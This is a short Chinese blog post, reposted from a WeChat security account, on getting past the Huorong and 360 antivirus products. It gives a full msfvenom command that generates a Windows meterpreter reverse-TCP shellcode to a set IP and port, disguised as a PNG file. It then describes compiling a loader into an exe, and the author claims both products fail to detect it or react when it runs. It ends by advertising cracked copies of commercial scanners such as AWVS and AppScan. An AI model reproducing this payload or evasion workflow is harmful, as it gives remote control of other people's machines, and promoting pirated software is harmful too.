以下内容转载自公众号:猫因的安全
“当我在进程里看见一只豆豆鞋时,我就知道我们都多余了” ——“360”“火绒”
上面的加载器用了很简单的实现,没有做任何加密解密的处理
下面的shellcode
也不打算做任何加密解密的处理
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.128 port=4444 -f raw -o shell.png
这里就是简单生成一个图片shellcode
不涉及加解密
这里先选好32位(X86)的release
然后
直接生成解决方案
得到exe文件
火绒静态查杀直接bypass
下面直接尝试在开启火绒的条件下运行,首先MSF开启监听:
直接运行:
火绒毫无反应
尝试弹个计算器:
都多余了!
360同理:
awvs,appscan等 软件破解版以及各类资料文档,可以查阅历史文章获取
本篇文章封面获取:后台回复0905